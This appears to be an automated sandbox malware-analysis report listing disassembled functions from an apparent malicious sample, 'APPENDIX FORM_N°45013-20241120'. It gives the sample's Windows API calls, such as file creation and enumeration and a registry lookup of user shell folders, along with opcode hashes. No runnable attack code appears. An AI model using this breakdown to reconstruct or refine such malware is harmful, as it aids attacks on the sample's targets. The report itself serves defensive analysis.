                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                              Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3934441357-0
                                                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                              Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                              • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                              Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                              Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                              Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 613200358-0
                                                                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                              Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                              Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumNamesResource
                                                                                                              • String ID:
                                                                                                              • API String ID: 3334572018-0
                                                                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                              Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                              Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseFind
                                                                                                              • String ID:
                                                                                                              • API String ID: 1863332320-0
                                                                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                              Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                              Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                              Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                              • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                              Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004095FC
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3655998216-0
                                                                                                              • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                              • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                              Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00445426
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                              • String ID:
                                                                                                              • API String ID: 1828521557-0
                                                                                                              • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                              • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                              Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@FilePointermemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 609303285-0
                                                                                                              • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                              • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                              • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                              • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                              Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 2081463915-0
                                                                                                              • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                              • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                              Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2136311172-0
